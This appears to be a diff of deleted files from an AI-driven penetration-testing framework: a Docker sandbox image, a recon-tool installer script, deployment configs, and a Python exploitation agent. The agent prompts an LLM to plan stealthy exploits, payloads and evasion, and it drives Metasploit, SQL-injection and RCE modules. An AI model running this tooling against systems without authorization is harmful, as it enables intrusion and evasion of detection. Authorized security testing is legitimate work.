RUN cargo install feroxbuster --locked
# Final runtime image
FROM alpine:3.19
# Install runtime dependencies and tools
RUN apk add --no-cache \
bash \
curl \
wget \
nmap \
nmap-scripts \
python3 \
py3-pip \
git \
jq \
bind-tools \
openssl \
libpcap \
ca-certificates \
nikto \
&& rm -rf /var/cache/apk/*
# Install Python security tools
RUN pip3 install --no-cache-dir --break-system-packages \
sqlmap \
wfuzz \
dirsearch \
arjun \
wafw00f \
whatweb 2>/dev/null || pip3 install --no-cache-dir --break-system-packages sqlmap wfuzz
# Copy Go binaries
COPY --from=go-builder /go/bin/* /usr/local/bin/
# Copy Rust binaries
COPY --from=rust-builder /usr/local/cargo/bin/feroxbuster /usr/local/bin/
# Install dirb
RUN apk add --no-cache dirb 2>/dev/null || \
(wget -q https://downloads.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz && \
tar -xzf dirb222.tar.gz && cd dirb222 && ./configure && make && make install && \
cd .. && rm -rf dirb222*) || true
# Create wordlists directory
RUN mkdir -p /opt/wordlists /opt/output
# Download common wordlists
RUN wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt \
-O /opt/wordlists/common.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt \
-O /opt/wordlists/directory-list-medium.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/raft-large-files.txt \
-O /opt/wordlists/raft-files.txt && \
wget -q https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt \
-O /opt/wordlists/subdomains-5000.txt
# Update nuclei templates
RUN nuclei -update-templates -silent 2>/dev/null || true
# Set working directory
WORKDIR /opt/output
# Default command
ENTRYPOINT ["/bin/bash", "-c"]
-38
View File
@@ -1,38 +0,0 @@
# NeuroSploit v3 - Kali Sandbox Build & Management
#
# Build image:
# docker compose -f docker/docker-compose.kali.yml build
#
# Build (no cache):
# docker compose -f docker/docker-compose.kali.yml build --no-cache
#
# Test container manually:
# docker compose -f docker/docker-compose.kali.yml run --rm kali-sandbox nuclei -version
#
# Note: In production, containers are managed by ContainerPool (core/container_pool.py).
# This compose file is for building the image and manual testing only.
services:
  kali-sandbox:
    build:
      context: .
      dockerfile: Dockerfile.kali
    image: neurosploit-kali:latest
    deploy:
      resources:
        limits:
          memory: 2G
          cpus: '2.0'
        reservations:
          memory: 512M
          cpus: '0.5'
    security_opt:
      - no-new-privileges:true
    cap_drop:
      - ALL
    cap_add:
      - NET_RAW
      - NET_ADMIN
    labels:
      neurosploit.type: "kali-sandbox"
      neurosploit.version: "3.0"
-51
View File
@@ -1,51 +0,0 @@
# NeuroSploit v3 - Security Sandbox
# Isolated container for running real penetration testing tools
#
# Usage:
# docker compose -f docker-compose.sandbox.yml up -d
# docker compose -f docker-compose.sandbox.yml exec sandbox nuclei -u https://target.com
# docker compose -f docker-compose.sandbox.yml down
services:
  sandbox:
    build:
      context: .
      dockerfile: Dockerfile.sandbox
    image: neurosploit-sandbox:latest
    container_name: neurosploit-sandbox
    command: ["sleep infinity"]
    restart: unless-stopped
    networks:
      - sandbox-net
    volumes:
      - sandbox-output:/opt/output
      - sandbox-templates:/opt/nuclei-templates
    deploy:
      resources:
        limits:
          memory: 2G
          cpus: '2.0'
        reservations:
          memory: 512M
          cpus: '0.5'
    security_opt:
      - no-new-privileges:true
    cap_drop:
      - ALL
    cap_add:
      - NET_RAW    # Required for naabu/nmap raw sockets
      - NET_ADMIN  # Required for packet capture
    healthcheck:
      test: ["CMD", "/opt/healthcheck.sh"]
      interval: 30s
      timeout: 10s
      retries: 3
networks:
  sandbox-net:
    driver: bridge
    internal: false
volumes:
  sandbox-output:
  sandbox-templates:
-47
View File
@@ -1,47 +0,0 @@
server {
listen 80;
server_name localhost;
root /usr/share/nginx/html;
index index.html;
# Gzip compression
gzip on;
gzip_types text/plain text/css application/json application/javascript text/xml application/xml;
# API proxy
location /api {
proxy_pass http://backend:8000;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_read_timeout 300s;
proxy_connect_timeout 75s;
}
# WebSocket proxy for scan updates
location /ws {
proxy_pass http://backend:8000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_read_timeout 86400;
proxy_send_timeout 86400;
}
# Frontend routes - serve index.html for SPA
location / {
try_files $uri $uri/ /index.html;
}
# Cache static assets
location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2)$ {
expires 1y;
add_header Cache-Control "public, immutable";
}
}
-116
View File
File diff suppressed because one or more lines are too long
-10
View File
@@ -1,10 +0,0 @@
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fnvw5h45lqt4ay45z1d0bd2u; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 23 Jun 2026 21:13:51 GMT
Content-Length: 13318
-544
View File
@@ -1,544 +0,0 @@
#!/bin/bash
#
# NeuroSploit v2 - Reconnaissance Tools Installer
# Installs all required tools for advanced reconnaissance
#
set -e
# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# Banner
echo -e "${CYAN}"
echo "╔═══════════════════════════════════════════════════════════════╗"
echo "║ NEUROSPLOIT v2 - TOOLS INSTALLER ║"
echo "║ Advanced Reconnaissance Tools Setup ║"
echo "╚═══════════════════════════════════════════════════════════════╝"
echo -e "${NC}"
# Detect OS
detect_os() {
if [[ "$OSTYPE" == "darwin"* ]]; then
OS="macos"
PKG_MANAGER="brew"
elif [ -f /etc/debian_version ]; then
OS="debian"
PKG_MANAGER="apt"
elif [ -f /etc/redhat-release ]; then
OS="redhat"
PKG_MANAGER="dnf"
elif [ -f /etc/arch-release ]; then
OS="arch"
PKG_MANAGER="pacman"
else
OS="unknown"
PKG_MANAGER="unknown"
fi
echo -e "${BLUE}[*] Detected OS: ${OS} (Package Manager: ${PKG_MANAGER})${NC}"
}
# Check if command exists
command_exists() {
command -v "$1" &> /dev/null
}
# Print status
print_status() {
if command_exists "$1"; then
echo -e " ${GREEN}[✓]${NC} $1 - installed"
return 0
else
echo -e " ${RED}[✗]${NC} $1 - not found"
return 1
fi
}
# Install Go if not present
install_go() {
if command_exists go; then
echo -e "${GREEN}[✓] Go is already installed${NC}"
return 0
fi
echo -e "${YELLOW}[*] Installing Go...${NC}"
if [ "$OS" == "macos" ]; then
brew install go
elif [ "$OS" == "debian" ]; then
sudo apt update && sudo apt install -y golang-go
elif [ "$OS" == "redhat" ]; then
sudo dnf install -y golang
elif [ "$OS" == "arch" ]; then
sudo pacman -S --noconfirm go
else
# Manual installation
GO_VERSION="1.21.5"
wget "https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf "go${GO_VERSION}.linux-amd64.tar.gz"
rm "go${GO_VERSION}.linux-amd64.tar.gz"
export PATH=$PATH:/usr/local/go/bin
echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
echo 'export PATH=$PATH:$(go env GOPATH)/bin' >> ~/.bashrc
fi
# Set GOPATH
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
}
# Install Rust if not present
install_rust() {
if command_exists cargo; then
echo -e "${GREEN}[✓] Rust is already installed${NC}"
return 0
fi
echo -e "${YELLOW}[*] Installing Rust...${NC}"
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source "$HOME/.cargo/env"
}
# Install Python packages
install_python_packages() {
echo -e "${BLUE}[*] Installing Python packages...${NC}"
pip3 install --upgrade pip 2>/dev/null || pip install --upgrade pip
# Core packages
pip3 install requests dnspython urllib3 2>/dev/null || pip install requests dnspython urllib3
# Security tools
pip3 install wafw00f 2>/dev/null || echo -e "${YELLOW} [!] wafw00f installation failed, try: pip install wafw00f${NC}"
pip3 install paramspider 2>/dev/null || echo -e "${YELLOW} [!] paramspider installation failed${NC}"
}
# Install tool via Go
install_go_tool() {
local tool_name=$1
local repo=$2
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - already installed"
return 0
fi
echo -e " ${YELLOW}[~]${NC} Installing $tool_name..."
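# "|| true" keeps "set -e" from aborting the script; failure is reported by the check below
go install "$repo@latest" 2>/dev/null || true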
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - installed successfully"
else
echo -e " ${RED}[✗]${NC} $tool_name - installation failed"
fi
}
# Install tool via Cargo (Rust)
install_cargo_tool() {
local tool_name=$1
local crate_name=${2:-$tool_name}
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - already installed"
return 0
fi
echo -e " ${YELLOW}[~]${NC} Installing $tool_name..."
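# "|| true" keeps "set -e" from aborting the script; failure is reported by the check below
cargo install "$crate_name" 2>/dev/null || true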
if command_exists "$tool_name"; then
echo -e " ${GREEN}[✓]${NC} $tool_name - installed successfully"
else
echo -e " ${RED}[✗]${NC} $tool_name - installation failed"
fi
}
# Install system packages
install_system_packages() {
echo -e "${BLUE}[*] Installing system packages...${NC}"
if [ "$OS" == "macos" ]; then
brew update
brew install nmap curl wget jq git python3 2>/dev/null || true
brew install feroxbuster 2>/dev/null || true
brew install nikto 2>/dev/null || true
brew install whatweb 2>/dev/null || true
elif [ "$OS" == "debian" ]; then
sudo apt update
sudo apt install -y nmap curl wget jq git python3 python3-pip dnsutils whois
sudo apt install -y nikto whatweb 2>/dev/null || true
elif [ "$OS" == "redhat" ]; then
sudo dnf install -y nmap curl wget jq git python3 python3-pip bind-utils whois
elif [ "$OS" == "arch" ]; then
sudo pacman -Syu --noconfirm nmap curl wget jq git python python-pip dnsutils whois
sudo pacman -S --noconfirm nikto whatweb 2>/dev/null || true
fi
}
# Install Go-based tools
install_go_tools() {
echo -e "\n${BLUE}[*] Installing Go-based reconnaissance tools...${NC}"
# Ensure Go paths are set
export GOPATH=${GOPATH:-$HOME/go}
export PATH=$PATH:$GOPATH/bin
# ProjectDiscovery tools
install_go_tool "subfinder" "github.com/projectdiscovery/subfinder/v2/cmd/subfinder"
install_go_tool "httpx" "github.com/projectdiscovery/httpx/cmd/httpx"
install_go_tool "nuclei" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei"
install_go_tool "naabu" "github.com/projectdiscovery/naabu/v2/cmd/naabu"
install_go_tool "katana" "github.com/projectdiscovery/katana/cmd/katana"
install_go_tool "dnsx" "github.com/projectdiscovery/dnsx/cmd/dnsx"
install_go_tool "shuffledns" "github.com/projectdiscovery/shuffledns/cmd/shuffledns"
# Other Go tools
install_go_tool "amass" "github.com/owasp-amass/amass/v4/..."
install_go_tool "assetfinder" "github.com/tomnomnom/assetfinder"
install_go_tool "waybackurls" "github.com/tomnomnom/waybackurls"
install_go_tool "gau" "github.com/lc/gau/v2/cmd/gau"
install_go_tool "httprobe" "github.com/tomnomnom/httprobe"
install_go_tool "ffuf" "github.com/ffuf/ffuf/v2"
install_go_tool "gobuster" "github.com/OJ/gobuster/v3"
install_go_tool "gospider" "github.com/jaeles-project/gospider"
install_go_tool "hakrawler" "github.com/hakluke/hakrawler"
install_go_tool "subjack" "github.com/haccer/subjack"
install_go_tool "gowitness" "github.com/sensepost/gowitness"
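    # NOTE: findomain is a Rust project, not a Go module, so this go install is
    # expected to fail; install it from the upstream release binaries instead.
    install_go_tool "findomain" "github.com/Findomain/Findomain"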
}
# Install Rust-based tools
install_rust_tools() {
echo -e "\n${BLUE}[*] Installing Rust-based tools...${NC}"
source "$HOME/.cargo/env" 2>/dev/null || true
install_cargo_tool "rustscan" "rustscan"
install_cargo_tool "feroxbuster" "feroxbuster"
}
# Install Nuclei templates
install_nuclei_templates() {
echo -e "\n${BLUE}[*] Updating Nuclei templates...${NC}"
    if command_exists nuclei; then
        # Report success only when the update actually succeeded
        if nuclei -update-templates 2>/dev/null; then
            echo -e " ${GREEN}[✓]${NC} Nuclei templates updated"
        else
            echo -e "${YELLOW} [!] Template update failed, run manually: nuclei -update-templates${NC}"
        fi
    else
        echo -e " ${RED}[✗]${NC} Nuclei not installed, skipping templates"
    fi
}
# Install SecLists
install_seclists() {
echo -e "\n${BLUE}[*] Checking SecLists...${NC}"
SECLISTS_PATH="/opt/wordlists/SecLists"
if [ -d "$SECLISTS_PATH" ]; then
echo -e " ${GREEN}[✓]${NC} SecLists already installed at $SECLISTS_PATH"
return 0
fi
echo -e " ${YELLOW}[~]${NC} Installing SecLists..."
sudo mkdir -p /opt/wordlists
sudo git clone --depth 1 https://github.com/danielmiessler/SecLists.git "$SECLISTS_PATH" 2>/dev/null || {
echo -e " ${RED}[✗]${NC} SecLists installation failed"
return 1
}
# Create symlinks for common wordlists
sudo ln -sf "$SECLISTS_PATH/Discovery/Web-Content/common.txt" /opt/wordlists/common.txt 2>/dev/null
sudo ln -sf "$SECLISTS_PATH/Discovery/Web-Content/raft-medium-directories.txt" /opt/wordlists/directories.txt 2>/dev/null
sudo ln -sf "$SECLISTS_PATH/Discovery/DNS/subdomains-top1million-5000.txt" /opt/wordlists/subdomains.txt 2>/dev/null
echo -e " ${GREEN}[✓]${NC} SecLists installed"
}
# Install additional tools via package managers or manual
install_additional_tools() {
echo -e "\n${BLUE}[*] Installing additional tools...${NC}"
# wafw00f
if ! command_exists wafw00f; then
echo -e " ${YELLOW}[~]${NC} Installing wafw00f..."
pip3 install wafw00f 2>/dev/null || pip install wafw00f 2>/dev/null
fi
print_status "wafw00f"
# paramspider
if ! command_exists paramspider; then
echo -e " ${YELLOW}[~]${NC} Installing paramspider..."
        pip3 install paramspider 2>/dev/null || {
            git clone https://github.com/devanshbatham/ParamSpider.git /tmp/paramspider 2>/dev/null
            # Run in a subshell so a failed cd cannot change the script's working directory
            (cd /tmp/paramspider && pip3 install . 2>/dev/null) || true
        }
fi
print_status "paramspider"
# whatweb
if ! command_exists whatweb; then
if [ "$OS" == "macos" ]; then
brew install whatweb 2>/dev/null
elif [ "$OS" == "debian" ]; then
sudo apt install -y whatweb 2>/dev/null
fi
fi
print_status "whatweb"
# nikto
if ! command_exists nikto; then
if [ "$OS" == "macos" ]; then
brew install nikto 2>/dev/null
elif [ "$OS" == "debian" ]; then
sudo apt install -y nikto 2>/dev/null
fi
fi
print_status "nikto"
# sqlmap
if ! command_exists sqlmap; then
echo -e " ${YELLOW}[~]${NC} Installing sqlmap..."
if [ "$OS" == "macos" ]; then
brew install sqlmap 2>/dev/null
elif [ "$OS" == "debian" ]; then
sudo apt install -y sqlmap 2>/dev/null
else
pip3 install sqlmap 2>/dev/null
fi
fi
print_status "sqlmap"
# eyewitness
if ! command_exists eyewitness; then
echo -e " ${YELLOW}[~]${NC} Installing EyeWitness..."
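        # /opt is usually root-owned, so clone with sudo (as install_seclists does)
        sudo git clone https://github.com/RedSiege/EyeWitness.git /opt/EyeWitness 2>/dev/null || true
        if [ -d "/opt/EyeWitness" ]; then
            # Run setup in a subshell so the script's working directory is left untouched
            (cd /opt/EyeWitness/Python/setup && sudo ./setup.sh 2>/dev/null) || true
            sudo ln -sf /opt/EyeWitness/Python/EyeWitness.py /usr/local/bin/eyewitness 2>/dev/null
        fi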
fi
print_status "eyewitness"
# wpscan
if ! command_exists wpscan; then
echo -e " ${YELLOW}[~]${NC} Installing wpscan..."
if [ "$OS" == "macos" ]; then
brew install wpscan 2>/dev/null
else
sudo gem install wpscan 2>/dev/null || true
fi
fi
print_status "wpscan"
# dirsearch
if ! command_exists dirsearch; then
echo -e " ${YELLOW}[~]${NC} Installing dirsearch..."
        pip3 install dirsearch 2>/dev/null || {
            # /opt is usually root-owned, so the clone needs sudo just like the symlink
            sudo git clone https://github.com/maurosoria/dirsearch.git /opt/dirsearch 2>/dev/null
            sudo ln -sf /opt/dirsearch/dirsearch.py /usr/local/bin/dirsearch 2>/dev/null
        }
fi
print_status "dirsearch"
# massdns (for shuffledns/puredns)
if ! command_exists massdns; then
echo -e " ${YELLOW}[~]${NC} Installing massdns..."
        git clone https://github.com/blechschmidt/massdns.git /tmp/massdns 2>/dev/null
        # Build in a subshell so a failed cd cannot change the script's working directory
        (cd /tmp/massdns && make 2>/dev/null && sudo make install 2>/dev/null) || true
fi
print_status "massdns"
# puredns
if ! command_exists puredns; then
echo -e " ${YELLOW}[~]${NC} Installing puredns..."
go install github.com/d3mondev/puredns/v2@latest 2>/dev/null
fi
print_status "puredns"
# waymore
if ! command_exists waymore; then
echo -e " ${YELLOW}[~]${NC} Installing waymore..."
pip3 install waymore 2>/dev/null || pip install waymore 2>/dev/null
fi
print_status "waymore"
}
# Check all tools status
check_tools_status() {
echo -e "\n${CYAN}═══════════════════════════════════════════════════════════════${NC}"
echo -e "${CYAN} TOOLS STATUS SUMMARY ${NC}"
echo -e "${CYAN}═══════════════════════════════════════════════════════════════${NC}\n"
echo -e "${BLUE}[Subdomain Enumeration]${NC}"
print_status "subfinder"
print_status "amass"
print_status "assetfinder"
print_status "findomain"
print_status "puredns"
print_status "shuffledns"
print_status "massdns"
echo -e "\n${BLUE}[HTTP Probing]${NC}"
print_status "httpx"
print_status "httprobe"
echo -e "\n${BLUE}[URL Collection]${NC}"
print_status "gau"
print_status "waybackurls"
print_status "waymore"
print_status "hakrawler"
echo -e "\n${BLUE}[Web Crawling]${NC}"
print_status "katana"
print_status "gospider"
echo -e "\n${BLUE}[Directory Bruteforce]${NC}"
print_status "feroxbuster"
print_status "gobuster"
print_status "ffuf"
print_status "dirsearch"
echo -e "\n${BLUE}[Port Scanning]${NC}"
print_status "rustscan"
print_status "naabu"
print_status "nmap"
echo -e "\n${BLUE}[Vulnerability Scanning]${NC}"
print_status "nuclei"
print_status "nikto"
print_status "sqlmap"
print_status "wpscan"
echo -e "\n${BLUE}[WAF Detection]${NC}"
print_status "wafw00f"
echo -e "\n${BLUE}[Parameter Discovery]${NC}"
print_status "paramspider"
echo -e "\n${BLUE}[Fingerprinting]${NC}"
print_status "whatweb"
echo -e "\n${BLUE}[Screenshot]${NC}"
print_status "gowitness"
print_status "eyewitness"
echo -e "\n${BLUE}[Subdomain Takeover]${NC}"
print_status "subjack"
echo -e "\n${BLUE}[DNS Tools]${NC}"
print_status "dnsx"
print_status "dig"
echo -e "\n${BLUE}[Utilities]${NC}"
print_status "curl"
print_status "wget"
print_status "jq"
print_status "git"
echo -e "\n${BLUE}[Wordlists]${NC}"
if [ -d "/opt/wordlists/SecLists" ]; then
echo -e " ${GREEN}[✓]${NC} SecLists - installed at /opt/wordlists/SecLists"
else
echo -e " ${RED}[✗]${NC} SecLists - not found"
fi
}
# Update PATH
update_path() {
echo -e "\n${BLUE}[*] Updating PATH...${NC}"
# Add Go bin to PATH
if ! grep -q 'GOPATH' ~/.bashrc 2>/dev/null; then
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
fi
if ! grep -q 'GOPATH' ~/.zshrc 2>/dev/null; then
echo 'export GOPATH=$HOME/go' >> ~/.zshrc 2>/dev/null || true
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.zshrc 2>/dev/null || true
fi
# Add Cargo bin to PATH
if ! grep -q '.cargo/bin' ~/.bashrc 2>/dev/null; then
echo 'export PATH=$PATH:$HOME/.cargo/bin' >> ~/.bashrc
fi
# Source for current session
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin:$HOME/.cargo/bin
echo -e " ${GREEN}[✓]${NC} PATH updated"
}
# Main installation function
main() {
echo -e "${BLUE}[*] Starting NeuroSploit tools installation...${NC}\n"
detect_os
# Parse arguments
INSTALL_ALL=false
CHECK_ONLY=false
while [[ "$#" -gt 0 ]]; do
case $1 in
--all) INSTALL_ALL=true ;;
--check) CHECK_ONLY=true ;;
--help|-h)
echo "Usage: $0 [OPTIONS]"
echo ""
echo "Options:"
echo " --all Install all tools (full installation)"
echo " --check Only check tool status, don't install"
echo " --help Show this help message"
echo ""
exit 0
;;
*) echo "Unknown parameter: $1"; exit 1 ;;
esac
shift
done
if [ "$CHECK_ONLY" = true ]; then
check_tools_status
exit 0
fi
# Installation steps
install_system_packages
install_go
install_rust
install_python_packages
install_go_tools
install_rust_tools
install_additional_tools
install_seclists
install_nuclei_templates
update_path
# Final status check
check_tools_status
echo -e "\n${GREEN}═══════════════════════════════════════════════════════════════${NC}"
echo -e "${GREEN} INSTALLATION COMPLETE! ${NC}"
echo -e "${GREEN}═══════════════════════════════════════════════════════════════${NC}"
echo -e "\n${YELLOW}[!] Please restart your terminal or run: source ~/.bashrc${NC}"
echo -e "${YELLOW}[!] Some tools may require sudo privileges to run${NC}\n"
}
# Run main
main "$@"
-84
View File
File diff suppressed because one or more lines are too long
-29
View File
@@ -1,29 +0,0 @@
# Legacy (pre-v3.3.0) Python orchestration
These files are the **previous** orchestration architecture, retired in
NeuroSploit v3.3.0 when the pentest agent was re-modeled into an autonomous,
markdown-driven engine that delegates execution to a local agentic CLI backend.
Kept for reference and migration only — **not** used by the v3.3.0 engine.
| Path | What it was |
|------|-------------|
| `neurosploit_legacy.py` | The 2,500-line monolithic CLI/orchestrator (`NeuroSploitv2`) |
| `agents_python/` | Hand-coded Python agent classes (web/exploitation/lateral/privesc/persistence/recon) |
| `custom_agents/` | Example custom Python agent |
| `core/` | Old orchestration support (llm_manager, sandbox, report_generator, …) |
| `backend_fastapi/` | Old FastAPI backend — replaced by `webgui/server.py` (stdlib) |
| `frontend_react/` | Old React/Vite dashboard — replaced by the minimalist `webgui/` |
| `test_agent_run.py` | Test harness for the old Python agents |
## What replaced it
- **`neurosploit` + `neurosploit_agent/`** — the lean autonomous engine
(`orchestrator`, `agent_loader`, `backends`, `rl`, `mcp`, `models`, `cli`).
- **`agents_md/`** — 213 curated markdown agents (196 vuln specialists + 17
meta-agents) that the engine composes into a master prompt.
- The engine runs **Claude Code / Codex / Grok CLI** (or a Claude subscription)
as the autonomous runtime, with **Playwright MCP** for browser-based proof and
a **reinforcement-learning** loop that adapts agent selection across runs.
Run `./neurosploit` (interactive) or `./neurosploit run <url>` to use the new engine.
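The "composes into a master prompt" step can be pictured with a minimal Python sketch. This is only an illustration under stated assumptions, not the engine's actual loader: the function name `compose_master_prompt`, the one-file-per-agent `<name>.md` layout, and the section separator are all hypothetical.

```python
from pathlib import Path


def compose_master_prompt(agents_dir: str, selected: list[str]) -> str:
    """Concatenate the selected markdown agents into one prompt string.

    Hypothetical helper: assumes each agent lives in `<agents_dir>/<name>.md`.
    """
    sections = []
    for name in selected:
        path = Path(agents_dir) / f"{name}.md"
        if not path.is_file():
            # Skip agents that are not present rather than failing the run.
            continue
        body = path.read_text(encoding="utf-8").strip()
        # Label each section so the runtime can tell the agents apart.
        sections.append(f"## Agent: {name}\n\n{body}")
    # A horizontal rule between sections keeps the agents visually separate.
    return "\n\n---\n\n".join(sections)
```

Calling `compose_master_prompt("agents_md", names)` with a list of agent names would return a single string that could be handed to whichever CLI backend is configured. Missing agents are skipped silently here, which is a design choice of this sketch rather than documented behavior.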
View File
File diff suppressed because it is too large Load Diff
-256
View File
@@ -1,256 +0,0 @@
#!/usr/bin/env python3
"""
Exploitation Agent - Vulnerability exploitation and access gaining
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.exploitation import (
ExploitDatabase,
MetasploitWrapper,
WebExploiter,
SQLInjector,
RCEExploiter,
BufferOverflowExploiter
)
logger = logging.getLogger(__name__)
class ExploitationAgent:
"""Agent responsible for vulnerability exploitation"""
def __init__(self, config: Dict):
"""Initialize exploitation agent"""
self.config = config
self.llm = LLMManager(config)
self.exploit_db = ExploitDatabase(config)
self.metasploit = MetasploitWrapper(config)
self.web_exploiter = WebExploiter(config)
self.sql_injector = SQLInjector(config)
self.rce_exploiter = RCEExploiter(config)
self.bof_exploiter = BufferOverflowExploiter(config)
logger.info("ExploitationAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute exploitation phase"""
logger.info(f"Starting exploitation on {target}")
results = {
"target": target,
"status": "running",
"successful_exploits": [],
"failed_attempts": [],
"shells_obtained": [],
"credentials_found": [],
"ai_recommendations": {}
}
try:
# Get reconnaissance data from context
recon_data = context.get("phases", {}).get("recon", {})
# Phase 1: Vulnerability Analysis
logger.info("Phase 1: Analyzing vulnerabilities")
vulnerabilities = self._identify_vulnerabilities(recon_data)
# Phase 2: AI-powered Exploit Selection
logger.info("Phase 2: AI exploit selection")
exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data)
results["ai_recommendations"] = exploit_plan
# Phase 3: Execute Exploits
logger.info("Phase 3: Executing exploits")
for vuln in vulnerabilities[:5]: # Limit to top 5 vulnerabilities
exploit_result = self._attempt_exploitation(vuln, target)
if exploit_result.get("success"):
results["successful_exploits"].append(exploit_result)
logger.info(f"Successful exploit: {vuln.get('type')}")
# Check for shell access
if exploit_result.get("shell_access"):
results["shells_obtained"].append(exploit_result["shell_info"])
else:
results["failed_attempts"].append(exploit_result)
# Phase 4: Post-Exploitation Intelligence
if results["successful_exploits"]:
logger.info("Phase 4: Post-exploitation intelligence gathering")
results["post_exploit_intel"] = self._gather_post_exploit_intel(
results["successful_exploits"]
)
results["status"] = "completed"
logger.info("Exploitation phase completed")
except Exception as e:
logger.error(f"Error during exploitation: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]:
"""Identify exploitable vulnerabilities from recon data"""
vulnerabilities = []
# Check network scan results
network_scan = recon_data.get("network_scan", {})
for host, data in network_scan.get("hosts", {}).items():
for port in data.get("open_ports", []):
vuln = {
"type": "network_service",
"host": host,
"port": port.get("port"),
"service": port.get("service"),
"version": port.get("version")
}
vulnerabilities.append(vuln)
# Check web vulnerabilities
web_analysis = recon_data.get("web_analysis", {})
for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]:
if web_analysis.get(vuln_type):
vulnerabilities.append({
"type": vuln_type,
"details": web_analysis[vuln_type]
})
return vulnerabilities
def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict:
"""Use AI to plan exploitation strategy"""
prompt = self.llm.get_prompt(
"exploitation",
"ai_exploit_planning_user",
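            # Plain template rather than an f-string: the placeholders are filled by
            # prompt.format() below, which would fail on pre-rendered JSON braces.
            default="""
Plan an exploitation strategy based on the following data:
Vulnerabilities Identified:
{vulnerabilities_json}
Reconnaissance Data:
{recon_data_json}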
Provide:
1. Prioritized exploitation order
2. Recommended exploits for each vulnerability
3. Payload suggestions
4. Evasion techniques
5. Fallback strategies
6. Success probability estimates
Response in JSON format with detailed exploitation roadmap.
"""
)
system_prompt = self.llm.get_prompt(
"exploitation",
"ai_exploit_planning_system",
default="""You are an expert exploit developer and penetration tester.
Create sophisticated exploitation plans considering detection, success rates, and impact.
Prioritize stealthy, reliable exploits over noisy attempts."""
)
try:
formatted_prompt = prompt.format(
vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
recon_data_json=json.dumps(recon_data, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI exploit planning error: {e}")
return {"error": str(e)}
def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict:
"""Attempt to exploit a specific vulnerability"""
vuln_type = vulnerability.get("type")
result = {
"vulnerability": vulnerability,
"success": False,
"method": None,
"details": {}
}
try:
if vuln_type == "sql_injection":
result = self.sql_injector.exploit(target, vulnerability)
elif vuln_type in ["xss", "csrf"]:
result = self.web_exploiter.exploit(target, vulnerability)
elif vuln_type in ["rce", "command_injection"]:
result = self.rce_exploiter.exploit(target, vulnerability)
elif vuln_type == "buffer_overflow":
result = self.bof_exploiter.exploit(target, vulnerability)
elif vuln_type == "network_service":
result = self._exploit_network_service(target, vulnerability)
else:
# Use Metasploit for generic exploitation
result = self.metasploit.exploit(target, vulnerability)
except Exception as e:
logger.error(f"Exploitation error for {vuln_type}: {e}")
result["error"] = str(e)
return result
def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit network service vulnerabilities"""
service = vulnerability.get("service", "").lower()
# Check exploit database for known exploits
exploits = self.exploit_db.search(service, vulnerability.get("version"))
if exploits:
logger.info(f"Found {len(exploits)} exploits for {service}")
for exploit in exploits[:3]: # Try top 3 exploits
result = self.metasploit.run_exploit(
exploit["module"],
target,
vulnerability.get("port")
)
if result.get("success"):
return result
return {"success": False, "message": "No suitable exploits found"}
def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict:
"""Gather intelligence after successful exploitation"""
intel = {
"system_info": [],
"user_accounts": [],
"network_info": [],
"installed_software": [],
"credentials": []
}
for exploit in successful_exploits:
if exploit.get("shell_access"):
shell = exploit["shell_info"]
# Gather system information
# This would execute actual commands on compromised system
# Placeholder for demonstration
intel["system_info"].append({
"os": "detected_os",
"hostname": "detected_hostname",
"architecture": "x64"
})
return intel
def generate_custom_exploit(self, vulnerability: Dict) -> str:
"""Generate custom exploit using AI"""
target_info = {
"vulnerability": vulnerability,
"requirements": "Create working exploit code"
}
return self.llm.generate_payload(target_info, vulnerability.get("type"))
-199
View File
@@ -1,199 +0,0 @@
#!/usr/bin/env python3
"""
Lateral Movement Agent - Move through the network
